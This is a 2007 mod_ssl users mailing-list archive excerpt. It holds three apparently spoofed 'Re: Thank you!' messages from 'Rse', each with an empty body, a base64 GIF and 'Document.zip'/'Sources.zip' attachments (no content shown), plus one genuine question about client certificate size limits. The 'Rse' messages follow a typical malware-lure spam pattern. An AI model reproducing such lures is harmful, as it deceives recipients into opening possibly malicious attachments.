/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan 22 15:35:17 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E287B14D884; Mon, 22 Jan 2007 15:35:17 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 510E714D82B
	for ; Mon, 22 Jan 2007 15:35:16 +0100 (CET)
Date: Mon, 22 Jan 2007 09:47:01 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 23 13:09:23 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9123A14D875; Tue, 23 Jan 2007 13:09:23 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from dmz-vsgate2.ldn.ibb.ubs.com (dmz-vsgate2.ldn.ibb.ubs.com [139.149.1.205])
	by master.modssl.org (Postfix) with ESMTP id 2EA1A14D83F
	for ; Tue, 23 Jan 2007 13:09:22 +0100 (CET)
Received: from sldn0848xmh.ldn.swissbank.com (localhost [127.0.0.1])
	by sldn0848xmh.ldn.swissbank.com (8.11.7+Sun/8.8.8) with ESMTP id l0NC8hw26017
	for ; Tue, 23 Jan 2007 12:08:43 GMT
Received: (from smap@localhost)
	by sldn0848xmh.ldn.swissbank.com (8.11.7+Sun/8.8.8) id l0NC8eu25898
	for ; Tue, 23 Jan 2007 12:08:40 GMT
Received: from  (inside [139.149.41.81]) by sldn0848xmh.ldn.swissbank.com via smap (V2.0b/ubs)
	id xma025833; Tue, 23 Jan 2007 12:08:35 GMT
Received: from nldn2382pap.ubsw.net (nldn2382pap.ldn.swissbank.com [139.149.219.135])
	by sldn0845pmh.ldn.swissbank.com (8.11.7+Sun/8.8.8) with ESMTP id l0NC8Nc22603
	for ; Tue, 23 Jan 2007 12:08:23 GMT
From: Vishal.Sharma@ubs.com
Received: from NLDNC101PEX1.ubsw.net ([139.149.215.133]) by nldn2382pap.ubsw.net with Microsoft SMTPSVC(6.0.3790.1830);
	 Tue, 23 Jan 2007 12:08:20 +0000
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Subject: Client Certificate size
Date: Tue, 23 Jan 2007 12:08:19 -0000
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Client Certificate size
Thread-Index: Acc+5ytuLYIMsjCDT1qc3xNWx9aeaQ==
To: 
X-OriginalArrivalTime: 23 Jan 2007 12:08:20.0663 (UTC) FILETIME=[2C667C70:01C73EE7]
X-UBSIB-Journal: yes
Content-Type: multipart/mixed; boundary="retimiled-emim-mijooneldraneldeen"
X-UBS-Disclaimer: Version $Revision: 1.27 $
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Vishal.Sharma@ubs.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--retimiled-emim-mijooneldraneldeen
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C73EE7.2C606B8D"

This is a multi-part message in MIME format.

------_=_NextPart_001_01C73EE7.2C606B8D
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hi,
Is there an upper bound on maximum client certificate size that
Apache/Mod_ssl can handle.
I am using
SSL_VERSION_LIBRARY=3DOpenSSL/0.9.7b , Apache 1.3.27
Thanks,
Vishal




------_=_NextPart_001_01C73EE7.2C606B8D
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable






Client Certificate size





Hi,


Is there an upper bound on maximum =
client certificate size that Apache/Mod_ssl can handle.


I am using


SSL_VERSION_LIBRARY=3DOpenSSL/0.9.7b =
, Apache 1.3.27


Thanks,


Vishal









------_=_NextPart_001_01C73EE7.2C606B8D--

--retimiled-emim-mijooneldraneldeen
Content-Type: text/plain; charset=us-ascii; name="disclaim.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Content-Description: Legal Disclaimer


Visit our website at http://www.ubs.com

This message contains confidential information and is intended only 
for the individual named.  If you are not the named addressee you 
should not disseminate, distribute or copy this e-mail.  Please 
notify the sender immediately by e-mail if you have received this 
e-mail by mistake and delete this e-mail from your system.

E-mail transmission cannot be guaranteed to be secure or error-free 
as information could be intercepted, corrupted, lost, destroyed, 
arrive late or incomplete, or contain viruses.  The sender therefore 
does not accept liability for any errors or omissions in the contents 
of this message which arise as a result of e-mail transmission.  If 
verification is required please request a hard-copy version.  This 
message is provided for informational purposes and should not be 
construed as a solicitation or offer to buy or sell any securities or 
related financial instruments.

UBS Limited is a company registered in England & Wales under company
number 2035362, whose registered office is at 1 Finsbury Avenue,
London, EC2M 2PP, United Kingdom.

UBS AG (London Branch) is registered as a branch of a foreign company
under number BR004507, whose registered office is at
1 Finsbury Avenue, London, EC2M 2PP, United Kingdom.

UBS Clearing and Execution Services Limited is a company registered
in England & Wales under company number 03123037, whose registered
office is at 1 Finsbury Avenue, London, EC2M 2PP, United Kingdom.

--retimiled-emim-mijooneldraneldeen--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan 23 18:04:39 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D1C5F14D876; Tue, 23 Jan 2007 18:04:39 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 3E8D814D83F
	for ; Tue, 23 Jan 2007 18:04:38 +0100 (CET)
Date: Tue, 23 Jan 2007 12:16:24 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
Content-Type: image/gif; name="vvvvvvvvvv.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="vvvvvvvvvv.gif"
Content-ID: 

R0lGODlheAAPAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAB4AA8AAAj/AP8JHEiwoMGD
CBMqXMiwocOHECNKnEixosWLGDNqnJhvRosoHg/l20ix2oxVCmeAbDHQo8eWLltGaTFjIE2a
JaM8GxglEMmJ1XQmzNcC5cB8UYwK3Fa0YFKC1a4onbhqRjWbNX9GrHoVYdBYBJ+16CpQLNiB
1ZqiVUtxVYuRAnv+i0Uz0Mhtz2ZcObQNb4sWfK9kDRRF4CqU+Q5FiXL23yqppf5VCxSo2qoo
I/8adEvWsVWCjztzBf25osqlnGNh7tjlX6mse54dYpkv0LPL/4jWDJoZJdOd/7r8jYUUZdrC
/04XfL2nssDXlOGWakG5a6AWzeEGutIl0LaJ2zx+/5xRqvM/uR6ffT/fgrjhmpQLrzr079AV
uB8FXvHpWSBR/glt0xF/3w141H9HhUdgPkgBCFFQUwkUy2HX7TSZSldV08UVUWTIUodRbNPh
eVklVxNTRs0kkEnALZQfQSoS1MIVTrEEY4kPjlXQIVblE0tpkmlW1mkQ0ncSff+8SJRxOiaJ
XFDmEVQKjUnSVwpygNVnI3VaCtRCZIp5iWRE061nU2HbECZZiOcdktc/TEXWUQvfzdgVZ45R
ad+dVqU1Q2Y4GoZZWiPNto1JhQ5qI25ifefWoW9NFEiguXUxw48sbeMWeSO5ldR6ciUX2UCq
fbneHjbmRhlTVMZYkFurkEd1mXOGAQaXY6YONKtWvPbq60OL/UXTTCvNIF6xyM5400fDKive
X1coS+xfwYKkkrAgzfSXR9ZmO+O1wm4rrLHBbksspQQFBAA7n1L/f/9//3//f/9//3//f/9/
/3//f/9//3//f18IXwj/f/9//3//f/9/XwhfCP9//3//f/9//39fCF8I/3//f/9//3//f18I
Xwj/f/9//3//f/9/XwhfCP9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
v3dfCF8IXwhfCF8IH0J/b/9//3//f/9//39fCH8t/39fCF8I31q/d/9//39fCF8I31q/d/9/
/3+fUl8I/3/fOX8tXwj/f19KX0r/fx9CXwifc/9//39fCF8I/3/fe18Ify3/f/9/n1JfCL93
/39/b18I3zn/f/9//3//f/9//3//f/9//3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9/
/3+/d793v3dfCN85/3//f793v3e/d18I3zn/f/9/v3e/d793XwjfOf9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//39fCF8I/3//f793H0JfCH9vv1ZfCL93v3dfCH8t
/3/fOV8I/3+fc38tn1LfOV8I/3+fc38tn1JfSl8I/39fa18IXwj/f59zXwifc59zXwifUv9/
X2tfCL9W/3//f38tXwhfCL9Wn3NfCJ9S/3+fUl8IXwj/f/9/XwhfCP9//3//f/9//3//f985
Xwh/LX8tf2//f/9/3zlfCH8tfy1/b/9//3/fOV8Ify1/LX9v/3//f985Xwh/LX8tf2//f/9/
3zlfCH8tfy1/b/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//39fSl8I
n3P/f/9/v3dfCN8533ufUl8IXwjfOX9v/3+/d59SXwhfCB9Cv3e/d59SXwhfCB9Cv3dfCF8I
/3//f985Xwj/f/9/X0pfSv9/f28fQl8IXwi/Vv9//3//f19KXwi/Vt85/39fa38t3zk/Zx9C
Xwifc/9/XwhfCP9//3//f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3+fUl8I
P2f/f/9//3//f59SXwg/Z/9//3//f/9/n1JfCD9n/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3+/Vl8IP2f/f/9//39fCF8I/3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f79WXwg/Z/9//3//f/9//3//f/9//3//fx9jXwi/Vv9/
/3//f/9/H2NfCL9W/3//f/9//38fY18Iv1b/f/9//3//fx9jXwi/Vv9//3//f/9/H2NfCL9W
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//38/Z18I31r/f/9/
f29fCN85/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//fz9nXwjfWv9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3+fc18IX0r/f/9/
/3//f59zXwhfSv9//3//f/9/n3NfCF9K/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3+fc18IXwhfCF8IXwgfQr93/3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f59zXwhfSv9//3//f/9//3//f/9//3//f/9/XwhfCF8IXwj/f/9/
/39fCF8IXwhfCP9//3//f18IXwhfCF8I/3//f/9/XwhfCF8IXwj/f/9//39fCF8IXwhfCP9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/
/3//f/9//3//f/9//3//f/9//3//f/9//3//f/9//3//f/9/

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"



----------vvvvvvvvvvvvvvvvvvvv
Content-Type: application/octet-stream; name="Sources.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Sources.zip"



----------vvvvvvvvvvvvvvvvvvvv--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jan 25 01:35:26 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3E9AE14D8A6; Thu, 25 Jan 2007 01:35:26 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from megatron.net (rrcs-24-97-204-25.nys.biz.rr.com [24.97.204.25])
	by master.modssl.org (Postfix) with SMTP id 9934E14D88F
	for ; Thu, 25 Jan 2007 01:35:25 +0100 (CET)
Date: Wed, 24 Jan 2007 19:47:13 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: Re: Thank you!
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvvvvvvvvvvvvvvvvvvv"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvvvvvvvvvvvvvvvvvvv
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit






----------vvvvvvvvvvvvvvvvvvvv
